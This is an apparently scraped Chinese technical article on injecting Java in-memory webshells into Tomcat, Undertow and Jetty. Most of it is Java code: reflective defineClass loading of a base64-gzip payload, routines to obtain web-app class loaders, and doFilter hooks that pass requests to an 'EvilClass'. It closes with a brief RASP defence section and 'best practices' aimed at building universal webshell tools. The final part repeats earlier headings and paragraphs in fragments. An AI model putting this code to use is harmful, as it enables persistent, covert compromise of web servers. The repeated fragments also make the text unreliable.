任意类加载环境下注入内存马技术详解<\/h1>

一、内存马注入基础原理<\/h2>
在JVM中，每个类都有其所属的类加载器。在Java内存马注入场景下，攻击者通常会制作一个恶意类并通过`ClassLoader.defineClass<\/code>方法注入到JVM中，然后通过特定方法注册到Web组件上以供访问。<\/p>`

1.1 基本注入方法<\/h3>
private<\/span> Object getShell<\/span>(<\/span>Object context)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    ClassLoader classLoader =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>classLoader ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        classLoader =<\/span> context.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        return<\/span> classLoader.<\/span>loadClass<\/span>(<\/span>getClassName()).<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> clazzByte =<\/span> gzipDecompress(<\/span>decodeBase64(<\/span>getBase64String()));<\/span>
<\/span><\/span>        Method defineClass =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> 
<\/span><\/span>            byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>        defineClass.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> clazz =<\/span> (<\/span>Class<?>)<\/span> defineClass.<\/span>invoke<\/span>(<\/span>classLoader,<\/span> clazzByte,<\/span> 0<\/span>,<\/span> clazzByte.<\/span>length<\/span>);<\/span>
<\/span><\/span>        return<\/span> clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这种方法看似完善，但实际上存在以下问题：<\/p>

依赖请求线程的上下文类加载器(Thread.currentThread().getContextClassLoader()<\/code>)<\/li>
在非请求线程环境下会失效<\/li>
context.getClass().getClassLoader()<\/code>在某些场景下不可用<\/li>
<\/ol>
二、类加载器选择优化<\/h2>
2.1 Tomcat中的类加载机制<\/h3>
在Tomcat中，ApplicationFilterConfig<\/code>类的getFilter<\/code>方法揭示了关键类加载逻辑：<\/p>
Filter getFilter<\/span>()<\/span> throws<\/span> ClassCastException,<\/span> ClassNotFoundException,<\/span> 
<\/span><\/span>    IllegalAccessException,<\/span> InstantiationException,<\/span> ServletException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>filter<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>filter<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        String filterClass =<\/span> this<\/span>.<\/span>filterDef<\/span>.<\/span>getFilterClass<\/span>();<\/span>
<\/span><\/span>        ClassLoader classLoader =<\/span> null<\/span>;<\/span>
<\/span><\/span>        if<\/span> (<\/span>filterClass.<\/span>startsWith<\/span>(<\/span>"org.apache.catalina."<\/span>))<\/span> {<\/span>
<\/span><\/span>            classLoader =<\/span> this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>();<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            classLoader =<\/span> this<\/span>.<\/span>context<\/span>.<\/span>getLoader<\/span>().<\/span>getClassLoader<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        Class clazz =<\/span> classLoader.<\/span>loadClass<\/span>(<\/span>filterClass);<\/span>
<\/span><\/span>        this<\/span>.<\/span>filter<\/span> =<\/span> (<\/span>Filter)<\/span>clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>filter<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>高版本Tomcat通过DefaultInstanceManager<\/code>实现类似功能：<\/p>
public<\/span> Object newInstance<\/span>(<\/span>String className)<\/span> throws<\/span> IllegalAccessException,<\/span> 
<\/span><\/span>    InvocationTargetException,<\/span> NamingException,<\/span> InstantiationException,<\/span> 
<\/span><\/span>    ClassNotFoundException,<\/span> IllegalArgumentException,<\/span> NoSuchMethodException,<\/span> 
<\/span><\/span>    SecurityException {<\/span>
<\/span><\/span>    Class<?><\/span> clazz =<\/span> loadClassMaybePrivileged(<\/span>className,<\/span> classLoader);<\/span>
<\/span><\/span>    return<\/span> newInstance(<\/span>clazz.<\/span>getConstructor<\/span>().<\/span>newInstance<\/span>(),<\/span> clazz);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 Servlet规范中的类加载器<\/h3>
Servlet 3.0规范中定义了ServletContext#getClassLoader<\/code>方法：<\/p>
\/**
<\/span><\/span><\/span> * Get the web application class loader associated with this ServletContext.
<\/span><\/span><\/span> *\/<\/span>
<\/span><\/span>public<\/span> ClassLoader getClassLoader<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>这为我们提供了获取Web应用类加载器的标准方式。<\/p>
三、通用类加载器获取方法<\/h2>
基于以上分析，可以编写通用的Web应用类加载器获取方法：<\/p>
private<\/span> ClassLoader getWebAppClassLoader<\/span>(<\/span>Object context)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> invokeMethod(<\/span>context,<\/span> "getClassLoader"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>));<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        Object loader =<\/span> invokeMethod(<\/span>context,<\/span> "getLoader"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> invokeMethod(<\/span>loader,<\/span> "getClassLoader"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>使用该方法改进后的内存马注入方法：<\/p>
@SuppressWarnings<\/span>(<\/span>"all"<\/span>)<\/span>
<\/span><\/span>private<\/span> Object getShell<\/span>(<\/span>Object context)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    ClassLoader webAppClassLoader =<\/span> getWebAppClassLoader(<\/span>context);<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        return<\/span> webAppClassLoader.<\/span>loadClass<\/span>(<\/span>getClassName()).<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> clazzByte =<\/span> gzipDecompress(<\/span>decodeBase64(<\/span>getBase64String()));<\/span>
<\/span><\/span>        Method defineClass =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> 
<\/span><\/span>            byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>        defineClass.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> clazz =<\/span> (<\/span>Class<?>)<\/span> defineClass.<\/span>invoke<\/span>(<\/span>webAppClassLoader,<\/span> 
<\/span><\/span>            clazzByte,<\/span> 0<\/span>,<\/span> clazzByte.<\/span>length<\/span>);<\/span>
<\/span><\/span>        return<\/span> clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>四、不同中间件的实现<\/h2>
4.1 Undertow实现<\/h3>
private<\/span> ClassLoader getWebAppClassLoader<\/span>(<\/span>Object context)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> invokeMethod(<\/span>context,<\/span> "getClassLoader"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>));<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        Object deploymentInfo =<\/span> getFieldValue(<\/span>context,<\/span> "deploymentInfo"<\/span>);<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> invokeMethod(<\/span>deploymentInfo,<\/span> "getClassLoader"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 Jetty实现<\/h3>
public<\/span> ClassLoader getWebAppClassLoader<\/span>(<\/span>Object context)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> invokeMethod(<\/span>context,<\/span> "getClassLoader"<\/span>));<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> ((<\/span>ClassLoader)<\/span> getFieldValue(<\/span>context,<\/span> "_classLoader"<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>五、ASM通用内存马Agent实现<\/h2>
为了编写通用的ASM内存马Agent，作者尝试了两种方式：<\/p>

直接植入方式<\/strong>：<\/li>
<\/ol>
@Override<\/span>
<\/span><\/span>public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain){<\/span>
<\/span><\/span>    if<\/span>(<\/span>new<\/span> EvilClass().<\/span>equals<\/span>(<\/span>new<\/span> Object[]{<\/span>request,<\/span> response,<\/span> chain})){<\/span>
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ other business code
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
系统类加载器方式<\/strong>（高版本JDK可能受限）：<\/li>
<\/ol>
@Override<\/span>
<\/span><\/span>public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain){<\/span>
<\/span><\/span>    if<\/span>(<\/span>Class.<\/span>forName<\/span>(<\/span>"org.example.EvilClass"<\/span>,<\/span> true<\/span>,<\/span> 
<\/span><\/span>        ClassLoader.<\/span>getSystemClassLoader<\/span>()).<\/span>newInstance<\/span>().<\/span>equals<\/span>(<\/span>new<\/span> Object[]{<\/span>request,<\/span> response,<\/span> chain})){<\/span>
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ other business code
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、防御措施<\/h2>


RASP防护<\/strong>：<\/p>

动态类加载分析<\/li>
恶意类扫描<\/li>
恶意类清除<\/li>
常见Web漏洞防护<\/li>
<\/ul>
<\/li>

推荐方案<\/strong>：<\/p>

使用靖云甲RASP加固高风险应用<\/li>
在护网行动等关键时期加强防护<\/li>
<\/ul>
<\/li>
<\/ol>
七、总结与最佳实践<\/h2>

在内存马注入时，优先使用ServletContext#getClassLoader<\/code>获取Web应用类加载器<\/li>
对于低版本Servlet容器，通过反射获取context.getLoader().getClassLoader()<\/code><\/li>
不同中间件需要适配不同的类加载器获取方式<\/li>
在编写通用内存马工具时，要考虑各种边缘情况和兼容性问题<\/li>
任何警告信息都应引起重视，可能隐藏着潜在问题<\/li>
<\/ol>
完整实现可参考MemShellParty<\/a>项目。<\/p>
任意类加载环境下注入内存马技术详解<\/h1>

一、内存马注入基础原理<\/h2> 在JVM中，每个类都有其所属的类加载器。在Java内存马注入场景下，攻击者通常会制作一个恶意类并通过ClassLoader.defineClass<\/code>方法注入到JVM中，然后通过特定方法注册到Web组件上以供访问。<\/p>

二、类加载器选择优化<\/h2>

四、不同中间件的实现<\/h2>

一、内存马注入基础原理<\/h2>
在JVM中，每个类都有其所属的类加载器。在Java内存马注入场景下，攻击者通常会制作一个恶意类并通过`ClassLoader.defineClass<\/code>方法注入到JVM中，然后通过特定方法注册到Web组件上以供访问。<\/p>`
